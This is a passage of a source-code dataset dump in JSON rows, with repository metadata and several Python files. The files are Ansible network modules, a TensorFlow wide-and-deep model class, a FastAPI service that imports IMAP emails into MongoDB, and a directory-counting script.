result['cache_updated'] = True\n else:\n nodes = cached\n\n if login is not None or automatic is not None:\n if target is None:\n if len(nodes) > 1:\n module.fail_json(msg=\"Need to specify a target\")\n else:\n target = nodes[0]\n else:\n # check given target is in cache\n check_target = False\n for node in nodes:\n if node == target:\n check_target = True\n break\n if not check_target:\n module.fail_json(msg=\"Specified target not found\")\n\n if show_nodes:\n result['nodes'] = nodes\n\n if login is not None:\n loggedon = target_loggedon(module, target)\n if (login and loggedon) or (not login and not loggedon):\n result['changed'] |= False\n if login:\n result['devicenodes'] = target_device_node(module, target)\n elif not check:\n if login:\n target_login(module, target, portal, port)\n # give udev some time\n time.sleep(1)\n result['devicenodes'] = target_device_node(module, target)\n else:\n target_logout(module, target)\n result['changed'] |= True\n result['connection_changed'] = True\n else:\n result['changed'] |= True\n result['connection_changed'] = True\n\n if automatic is not None:\n isauto = target_isauto(module, target)\n if (automatic and isauto) or (not automatic and not isauto):\n result['changed'] |= False\n result['automatic_changed'] = False\n elif not check:\n if automatic:\n target_setauto(module, target)\n else:\n target_setmanual(module, target)\n result['changed'] |= True\n result['automatic_changed'] = True\n else:\n result['changed'] |= True\n result['automatic_changed'] = True\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":31.1284153005,"string":"31.128415"},"max_line_length":{"kind":"number","value":121,"string":"121"},"alphanum_fraction":{"kind":"number","value":0.5981743176,"string":"0.598174"}}},{"rowIdx":46366,"cells":{"hexsha":{"kind":"string","value":"4306437305398fdfa56682cb39fae32e02b7acb6"},"size":{"kind":"number","value":15271,"string":"15,271"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_stars_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_stars_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1107,"string":"1,107"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-09-21T02:18:36.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-29T02:52:12.000Z"},"max_issues_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_issues_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_issues_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":18,"string":"18"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-12-22T10:24:47.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-11T23:18:43.000Z"},"max_forks_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_forks_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_forks_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":776,"string":"776"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-12-21T12:08:08.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-21T06:12:08.000Z"},"content":{"kind":"string","value":"import os\nimport sys\nroot_path = os.path.abspath(\"../../../\")\nif root_path not in sys.path:\n sys.path.append(root_path)\n\nimport math\nimport numpy as np\nimport tensorflow as tf\n\nfrom _Dist.NeuralNetworks.NNUtil import *\nfrom _Dist.NeuralNetworks.c_BasicNN.DistNN import Basic\n\n\nclass Advanced(Basic):\n signature = \"Advanced\"\n\n def __init__(self, name=None, data_info=None, model_param_settings=None, model_structure_settings=None):\n self.tf_list_collections = None\n super(Advanced, self).__init__(name, model_param_settings, model_structure_settings)\n self._name_appendix = \"Advanced\"\n\n if data_info is None:\n self.data_info = {}\n else:\n assert_msg = \"data_info should be a dictionary\"\n assert isinstance(data_info, dict), assert_msg\n self.data_info = data_info\n self._data_info_initialized = False\n self.numerical_idx = self.categorical_columns = None\n\n self._deep_input = self._wide_input = None\n self._categorical_xs = None\n self.embedding_size = None\n self._embedding = self._one_hot = self._embedding_concat = self._one_hot_concat = None\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = None\n\n self.dropout_keep_prob = self.use_batch_norm = None\n self._use_wide_network = self._dndf = self._pruner = self._dndf_pruner = None\n\n self._tf_p_keep = None\n self._n_batch_placeholder = None\n\n @property\n def valid_numerical_idx(self):\n return np.array([\n is_numerical for is_numerical in self.numerical_idx\n if is_numerical is not None\n ])\n\n def init_data_info(self):\n if self._data_info_initialized:\n return\n self._data_info_initialized = True\n self.numerical_idx = self.data_info.get(\"numerical_idx\", None)\n self.categorical_columns = self.data_info.get(\"categorical_columns\", None)\n if self.numerical_idx is None:\n raise ValueError(\"numerical_idx should be provided\")\n if self.categorical_columns is None:\n raise ValueError(\"categorical_columns should be provided\")\n\n def init_from_data(self, x, y, x_test, y_test, sample_weights, names):\n self.init_data_info()\n super(Advanced, self).init_from_data(x, y, x_test, y_test, sample_weights, names)\n if len(self.valid_numerical_idx) != self.n_dim + 1:\n raise ValueError(\"Length of valid_numerical_idx should be {}, {} found\".format(\n self.n_dim + 1, len(self.valid_numerical_idx)\n ))\n self.n_dim -= len(self.categorical_columns)\n self.model_structure_settings.setdefault(\"use_wide_network\", self.n_dim > 0)\n\n def init_model_param_settings(self):\n super(Advanced, self).init_model_param_settings()\n self.dropout_keep_prob = float(self.model_param_settings.get(\"keep_prob\", 0.5))\n self.use_batch_norm = self.model_param_settings.get(\"use_batch_norm\", False)\n\n def init_model_structure_settings(self):\n self.hidden_units = self.model_structure_settings.get(\"hidden_units\", None)\n self._deep_input = self.model_structure_settings.get(\"deep_input\", \"embedding_concat\")\n self._wide_input = self.model_structure_settings.get(\"wide_input\", \"continuous\")\n self.embedding_size = self.model_structure_settings.get(\"embedding_size\", 8)\n\n self._use_wide_network = self.model_structure_settings[\"use_wide_network\"]\n if not self._use_wide_network:\n self._dndf = None\n else:\n dndf_params = self.model_structure_settings.get(\"dndf_params\", {})\n if self.model_structure_settings.get(\"use_dndf\", True):\n self._dndf = DNDF(self.n_class, **dndf_params)\n if self.model_structure_settings.get(\"use_pruner\", True):\n pruner_params = self.model_structure_settings.get(\"pruner_params\", {})\n self._pruner = Pruner(**pruner_params)\n if self.model_structure_settings.get(\"use_dndf_pruner\", False):\n dndf_pruner_params = self.model_structure_settings.get(\"dndf_pruner_params\", {})\n self._dndf_pruner = Pruner(**dndf_pruner_params)\n\n def _get_embedding(self, i, n):\n embedding_size = math.ceil(math.log2(n)) + 1 if self.embedding_size == \"log\" else self.embedding_size\n embedding = tf.Variable(tf.truncated_normal(\n [n, embedding_size], mean=0, stddev=0.02\n ), name=\"Embedding{}\".format(i))\n return tf.nn.embedding_lookup(embedding, self._categorical_xs[i], name=\"Embedded_X{}\".format(i))\n\n def _define_hidden_units(self):\n n_data = len(self._train_generator)\n current_units = self._deep_input.shape[1].value\n if current_units > 512:\n self.hidden_units = [1024, 1024]\n elif current_units > 256:\n if n_data >= 10000:\n self.hidden_units = [1024, 1024]\n else:\n self.hidden_units = [2 * current_units, 2 * current_units]\n else:\n if n_data >= 100000:\n self.hidden_units = [768, 768]\n elif n_data >= 10000:\n self.hidden_units = [512, 512]\n else:\n self.hidden_units = [2 * current_units, 2 * current_units]\n\n def _fully_connected_linear(self, net, shape, appendix):\n with tf.name_scope(\"Linear{}\".format(appendix)):\n w = init_w(shape, \"W{}\".format(appendix))\n if self._pruner is not None:\n w = self._pruner.prune_w(*self._pruner.get_w_info(w))\n b = init_b([shape[1]], \"b{}\".format(appendix))\n self._ws.append(w)\n self._bs.append(b)\n return tf.add(tf.matmul(net, w), b, name=\"Linear{}_Output\".format(appendix))\n\n def _build_layer(self, i, net):\n if self.use_batch_norm:\n net = tf.layers.batch_normalization(net, training=self._is_training, name=\"BN{}\".format(i))\n activation = self.activations[i]\n if activation is not None:\n net = getattr(Activations, activation)(net, \"{}{}\".format(activation, i))\n if self.dropout_keep_prob < 1:\n net = tf.nn.dropout(net, keep_prob=self._tf_p_keep)\n return net\n\n def _build_model(self, net=None):\n super(Advanced, self)._build_model(self._deep_input)\n if self._use_wide_network:\n if self._dndf is None:\n wide_output = self._fully_connected_linear(\n self._wide_input, appendix=\"_wide_output\",\n shape=[self._wide_input.shape[1].value, self.n_class]\n )\n else:\n wide_output = self._dndf(\n self._wide_input, self._n_batch_placeholder,\n pruner=self._dndf_pruner\n )\n self._output += wide_output\n\n def _get_feed_dict(self, x, y=None, weights=None, is_training=True):\n continuous_x = x[..., self.valid_numerical_idx[:-1]] if self._categorical_xs else x\n feed_dict = super(Advanced, self)._get_feed_dict(continuous_x, y, weights, is_training)\n if self._dndf is not None:\n feed_dict[self._n_batch_placeholder] = len(x)\n if self._pruner is not None:\n cond_placeholder = self._pruner.cond_placeholder\n if cond_placeholder is not None:\n feed_dict[cond_placeholder] = True\n if self._dndf is not None and self._dndf_pruner is not None:\n cond_placeholder = self._dndf_pruner.cond_placeholder\n if cond_placeholder is not None:\n feed_dict[cond_placeholder] = True\n for (idx, _), categorical_x in zip(self.categorical_columns, self._categorical_xs):\n feed_dict.update({categorical_x: x[..., idx].astype(np.int32)})\n return feed_dict\n\n def _define_input_and_placeholder(self):\n super(Advanced, self)._define_input_and_placeholder()\n if not self.categorical_columns:\n self._categorical_xs = []\n self._one_hot = self._one_hot_concat = self._tfx\n self._embedding = self._embedding_concat = self._tfx\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = self._tfx\n else:\n all_categorical = self.n_dim == 0\n with tf.name_scope(\"Categorical_Xs\"):\n self._categorical_xs = [\n tf.placeholder(tf.int32, shape=[None], name=\"Categorical_X{}\".format(i))\n for i in range(len(self.categorical_columns))\n ]\n with tf.name_scope(\"One_hot\"):\n one_hot_vars = [\n tf.one_hot(self._categorical_xs[i], n)\n for i, (_, n) in enumerate(self.categorical_columns)\n ]\n self._one_hot = self._one_hot_concat = tf.concat(one_hot_vars, 1, name=\"Raw\")\n if not all_categorical:\n self._one_hot_concat = tf.concat([self._tfx, self._one_hot], 1, name=\"Concat\")\n with tf.name_scope(\"Embedding\"):\n embeddings = [\n self._get_embedding(i, n)\n for i, (_, n) in enumerate(self.categorical_columns)\n ]\n self._embedding = self._embedding_concat = tf.concat(embeddings, 1, name=\"Raw\")\n if not all_categorical:\n self._embedding_concat = tf.concat([self._tfx, self._embedding], 1, name=\"Concat\")\n with tf.name_scope(\"Embedding_with_one_hot\"):\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = tf.concat(\n embeddings + one_hot_vars, 1, name=\"Raw\"\n )\n if not all_categorical:\n self._embedding_with_one_hot_concat = tf.concat(\n [self._tfx, self._embedding_with_one_hot], 1, name=\"Concat\"\n )\n if self._wide_input == \"continuous\":\n self._wide_input = self._tfx\n else:\n self._wide_input = getattr(self, \"_\" + self._wide_input)\n if self._deep_input == \"continuous\":\n self._deep_input = self._tfx\n else:\n self._deep_input = getattr(self, \"_\" + self._deep_input)\n if self.hidden_units is None:\n self._define_hidden_units()\n self._tf_p_keep = tf.cond(\n self._is_training, lambda: self.dropout_keep_prob, lambda: 1.,\n name=\"keep_prob\"\n )\n self._n_batch_placeholder = tf.placeholder(tf.int32, name=\"n_batch\")\n\n def _define_py_collections(self):\n super(Advanced, self)._define_py_collections()\n self.py_collections += [\"data_info\", \"numerical_idx\", \"categorical_columns\"]\n\n def _define_tf_collections(self):\n super(Advanced, self)._define_tf_collections()\n self.tf_collections += [\n \"_deep_input\", \"_wide_input\", \"_n_batch_placeholder\",\n \"_embedding\", \"_one_hot\", \"_embedding_with_one_hot\",\n \"_embedding_concat\", \"_one_hot_concat\", \"_embedding_with_one_hot_concat\"\n ]\n self.tf_list_collections = [\"_categorical_xs\"]\n\n def add_tf_collections(self):\n super(Advanced, self).add_tf_collections()\n for tf_list in self.tf_list_collections:\n target_list = getattr(self, tf_list)\n if target_list is None:\n continue\n for tensor in target_list:\n tf.add_to_collection(tf_list, tensor)\n\n def restore_collections(self, folder):\n for tf_list in self.tf_list_collections:\n if tf_list is not None:\n setattr(self, tf_list, tf.get_collection(tf_list))\n super(Advanced, self).restore_collections(folder)\n\n def clear_tf_collections(self):\n super(Advanced, self).clear_tf_collections()\n for key in self.tf_list_collections:\n tf.get_collection_ref(key).clear()\n\n def print_settings(self, only_return=False):\n msg = \"\\n\".join([\n \"=\" * 100, \"This is a {}\".format(\n \"{}-classes problem\".format(self.n_class) if not self.n_class == 1\n else \"regression problem\"\n ), \"-\" * 100,\n \"Data : {} training samples, {} test samples\".format(\n len(self._train_generator), len(self._test_generator) if self._test_generator is not None else 0\n ),\n \"Features : {} categorical, {} numerical\".format(\n len(self.categorical_columns), np.sum(self.valid_numerical_idx)\n )\n ]) + \"\\n\"\n\n msg += \"=\" * 100 + \"\\n\"\n msg += \"Deep model: DNN\\n\"\n msg += \"Deep model input: {}\\n\".format(\n \"Continuous features only\" if not self.categorical_columns else\n \"Continuous features with embeddings\" if np.any(self.numerical_idx) else\n \"Embeddings only\"\n )\n msg += \"-\" * 100 + \"\\n\"\n if self.categorical_columns:\n msg += \"Embedding size: {}\\n\".format(self.embedding_size)\n msg += \"Actual feature dimension: {}\\n\".format(self._embedding_concat.shape[1].value)\n msg += \"-\" * 100 + \"\\n\"\n if self.dropout_keep_prob < 1:\n msg += \"Using dropout with keep_prob = {}\\n\".format(self.dropout_keep_prob)\n else:\n msg += \"Training without dropout\\n\"\n msg += \"Training {} batch norm\\n\".format(\"with\" if self.use_batch_norm else \"without\")\n msg += \"Hidden units: {}\\n\".format(self.hidden_units)\n\n msg += \"=\" * 100 + \"\\n\"\n if not self._use_wide_network:\n msg += \"Wide model: None\\n\"\n else:\n msg += \"Wide model: {}\\n\".format(\"logistic regression\" if self._dndf is None else \"DNDF\")\n msg += \"Wide model input: Continuous features only\\n\"\n msg += \"-\" * 100 + '\\n'\n if self._dndf is not None:\n msg += \"Using DNDF with n_tree = {}, tree_depth = {}\\n\".format(\n self._dndf.n_tree, self._dndf.tree_depth\n )\n\n msg += \"\\n\".join([\"=\" * 100, \"Hyper parameters\", \"-\" * 100, \"{}\".format(\n \"This is a DNN model\" if self._dndf is None and not self._use_wide_network else\n \"This is a Wide & Deep model\" if self._dndf is None else\n \"This is a hybrid model\"\n ), \"-\" * 100]) + \"\\n\"\n msg += \"Activation : \" + str(self.activations) + \"\\n\"\n msg += \"Batch size : \" + str(self.batch_size) + \"\\n\"\n msg += \"Epoch num : \" + str(self.n_epoch) + \"\\n\"\n msg += \"Optimizer : \" + self._optimizer_name + \"\\n\"\n msg += \"Metric : \" + self._metric_name + \"\\n\"\n msg += \"Loss : \" + self._loss_name + \"\\n\"\n msg += \"lr : \" + str(self.lr) + \"\\n\"\n msg += \"-\" * 100 + \"\\n\"\n msg += \"Pruner : {}\".format(\"None\" if self._pruner is None else \"\") + \"\\n\"\n if self._pruner is not None:\n msg += \"\\n\".join(\"-> {:14}: {}\".format(key, value) for key, value in sorted(\n self._pruner.params.items()\n )) + \"\\n\"\n msg += \"-\" * 100\n return msg if only_return else self.log_msg(\n \"\\n\" + msg, logger=self.get_logger(\"print_settings\", \"general.log\"))\n"},"avg_line_length":{"kind":"number","value":46.7003058104,"string":"46.700306"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.6034313404,"string":"0.603431"}}},{"rowIdx":46367,"cells":{"hexsha":{"kind":"string","value":"60cc8fde5298eb8b2ba7eb219e5f4d8541b683fd"},"size":{"kind":"number","value":4515,"string":"4,515"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_stars_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_stars_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_stars_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n \"Unlicense\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-06T20:29:28.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-12-06T20:29:28.000Z"},"max_issues_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_issues_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_issues_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_issues_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n \"Unlicense\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_forks_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_forks_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_forks_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n \"Unlicense\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import os\nfrom imap_tools import MailBox, AND\nimport pymongo\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom bs4 import BeautifulSoup\nimport uvicorn\n\napp = FastAPI()\n#check if rest api is running\n\nprint(\"Rest-Server running\")\n\n# create class ImportEmails with imap_username imap_password imap_server_url mongodb_connection_string collection_name\nclass ImportEmails(BaseModel):\n imap_username: str = os.environ.get('IMAP_PALIDO_USERNAME')\n imap_password: str = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')\n imap_server_url: str = os.environ.get('IMAP_PALIDO_SERVER')\n mongodb_connection_string: str = os.environ.get('ME_CONFIG_MONGODB_URL')\n collection_name: str = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')\n\n\n\n \ndef scrape_emails(ImportEmails):\n # create a mongodb connection \n ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')\n ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')\n ImportEmails.mongodb_connection_string = os.environ.get('ME_CONFIG_MONGODB_URL')\n ImportEmails.collection_name = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')\n ImportEmails.imap_server_url = os.environ.get('IMAP_PALIDO_SERVER')\n # connect to mongodb\n # if ImportEmails.imap_username == \"username\" then use os.environ.get('IMAP_PALIDO_USERNAME')\n# if ImportEmails.imap_password == \"password\" then use os.environ.get('IMAP_PALIDO_PASSWORD')\n #if(ImportEmails.imap_username == \"username\"):\n # ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')\n #if(ImportEmails.imap_password == \"password\"):\n # ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_PASSWORD')\n myclient = pymongo.MongoClient(ImportEmails.mongodb_connection_string)\n\n #check if mongodb is connected\n if myclient:\n print(\"MongoDB is connected\")\n print(\"Connected with: \" + str(ImportEmails.mongodb_connection_string))\n mydb = myclient[\"Cellarius\"]\n print(\"Connected to MongoDB\")\n # create collection with name collection_name from ImportEmails\n\n # TODO: the collection name is allways \"None\" it should be the name of the ImportEmails.collection_name var\n col = \"imported_emails\"\n\n collection = mydb[col]\n print(\"Open collection :\" + collection.name)\n \n #if the collection allready exists then stop the def\n print(collection.count_documents({}))\n # if the collection has more then one document then stop the def\n if collection.count_documents({}) > 1:\n print(\"Collection has more then one document\")\n return\n\n \n \n # print out current collectionname\n print(\"Collection created:\" + collection.name)\n \n\n #print(\"Start scraping emails from:\")\n #print(str(ImportEmails.imap_server_url))\n #print(str(ImportEmails.imap_username))\n mailbox = MailBox(str(ImportEmails.imap_server_url))\n mailbox.login(str(ImportEmails.imap_username), str(ImportEmails.imap_password), initial_folder='INBOX')\n c = 0\n for msg in mailbox.fetch(AND(all=True)):\n\n soup = BeautifulSoup(msg.html, 'html.parser')\n email_texts = soup.get_text().split('Von:')\n email_texts_parsed = []\n for e in email_texts:\n text = (''.join(list(filter(None, e.split('\\n')))))\n email_texts_parsed.append(text)\n\n email_conversation = {\n \"uid\": msg.uid,\n \"subject\": msg.subject,\n \"from\": msg.from_,\n \"to\": msg.to,\n \"html\": msg.html,\n \"email_texts\" : email_texts_parsed,\n \"data_status\": 0\n }\n\n c = c + 1\n x = collection.insert_one(email_conversation)\n print (\"Saved:\", c, msg.uid, msg.subject)\n\n mailbox.logout()\n print(\"Finished scraping emails\")\n\n\n# run ImportEmails scrape_emails\n\n\n#scrape_emails(ImportEmails)\n\n#create a post req to fill class ImportEmails\n@app.post(\"/start-import-emails\")\nasync def import_emails(input: ImportEmails):\n #if the Input is empty fill in the os.environ\n scrape_emails(ImportEmails)\n return \"OK\"\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n#uvicorn.run(app, host=\"0.0.0.0\", port=8000)\nuvicorn.run(app, host=\"0.0.0.0\", port=8000, root_path=\"/cellarius/import-emails\")\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":36.4112903226,"string":"36.41129"},"max_line_length":{"kind":"number","value":118,"string":"118"},"alphanum_fraction":{"kind":"number","value":0.6671096346,"string":"0.66711"}}},{"rowIdx":46368,"cells":{"hexsha":{"kind":"string","value":"71e1fc0892b74520084fc5cc7410f69346dd3218"},"size":{"kind":"number","value":479,"string":"479"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_stars_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_stars_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_issues_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_issues_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_forks_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_forks_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from pathlib import Path\r\n\r\n# Zähle die Anzahle Ordner in einem Ordner (inkl. Unetrordner)\r\n\r\n\r\ndef count_dirs(path):\r\n try:\r\n subdirs = [subdir for subdir in path.iterdir() if subdir.is_dir()] # Unterordner dieses Verzeichnis\r\n count = 1\r\n for subdir in subdirs:\r\n count += count_dirs(subdir)\r\n return count\r\n except PermissionError:\r\n return 1\r\n\r\ncount = count_dirs(Path(\"O:\\Spielwiese\"))\r\nprint(count)\r\n\r\n#problem interative"},"avg_line_length":{"kind":"number","value":25.2105263158,"string":"25.210526"},"max_line_length":{"kind":"number","value":108,"string":"108"},"alphanum_fraction":{"kind":"number","value":0.643006263,"string":"0.643006"}}},{"rowIdx":46369,"cells":{"hexsha":{"kind":"string","value":"46080f0351429e6f033ebda794d228d6c1c01157"},"size":{"kind":"number","value":5905,"string":"5,905"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n#\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: onyx_aaa\nauthor: \"Sara Touqan (@sarato)\"\nshort_description: Configures AAA parameters\ndescription:\n - This module provides declarative management of AAA protocol params\n on Mellanox ONYX network devices.\noptions:\n tacacs_accounting_enabled:\n description:\n - Configures accounting settings.\n type: bool\n auth_default_user:\n description:\n - Sets local user default mapping.\n type: str\n choices: ['admin', 'monitor']\n auth_order:\n description:\n - Sets the order on how to handle remote to local user mappings.\n type: str\n choices: ['local-only', 'remote-first', 'remote-only']\n auth_fallback_enabled:\n description:\n - Enables/Disables fallback server-err option.\n type: bool\n'''\n\nEXAMPLES = \"\"\"\n- name: configures aaa\n onyx_aaa:\n tacacs_accounting_enabled: yes\n auth_default_user: monitor\n auth_order: local-only\n auth_fallback_enabled: false\n\"\"\"\n\nRETURN = \"\"\"\ncommands:\n description: The list of configuration mode commands to send to the device.\n returned: always\n type: list\n sample:\n - aaa accounting changes default stop-only tacacs+\n - no aaa accounting changes default stop-only tacacs+\n - aaa authorization map default-user \n - aaa authorization map order \n - aaa authorization map fallback server-err\n - no aaa authorization map fallback server-err\n\"\"\"\n\nimport re\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nfrom ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import show_cmd\nfrom ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import BaseOnyxModule\n\n\nclass OnyxAAAModule(BaseOnyxModule):\n\n def init_module(self):\n \"\"\" initialize module\n \"\"\"\n element_spec = dict(\n tacacs_accounting_enabled=dict(type='bool'),\n auth_default_user=dict(type='str', choices=['admin', 'monitor']),\n auth_order=dict(type='str', choices=['local-only', 'remote-first', 'remote-only']),\n auth_fallback_enabled=dict(type='bool')\n )\n argument_spec = dict()\n argument_spec.update(element_spec)\n self._module = AnsibleModule(\n argument_spec=argument_spec,\n supports_check_mode=True)\n\n def get_required_config(self):\n module_params = self._module.params\n self._required_config = dict(module_params)\n self.validate_param_values(self._required_config)\n\n def _set_aaa_config(self, all_aaa_config):\n aaa_config = all_aaa_config[0]\n self._current_config['auth_default_user'] = aaa_config.get(\"Default User\")\n self._current_config['auth_order'] = aaa_config.get(\"Map Order\")\n auth_fallback_enabled = aaa_config.get(\"Fallback on server-err\")\n if auth_fallback_enabled == \"yes\":\n self._current_config['auth_fallback_enabled'] = True\n else:\n self._current_config['auth_fallback_enabled'] = False\n aaa_config_2 = all_aaa_config[2]\n accounting_message = aaa_config_2.get(\"message\")\n if accounting_message == \"No accounting methods configured.\":\n self._current_config['tacacs_accounting_enabled'] = False\n else:\n self._current_config['tacacs_accounting_enabled'] = True\n\n def _show_aaa_config(self):\n cmd = \"show aaa\"\n return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)\n\n def load_current_config(self):\n self._current_config = dict()\n aaa_config = self._show_aaa_config()\n if aaa_config:\n self._set_aaa_config(aaa_config)\n\n 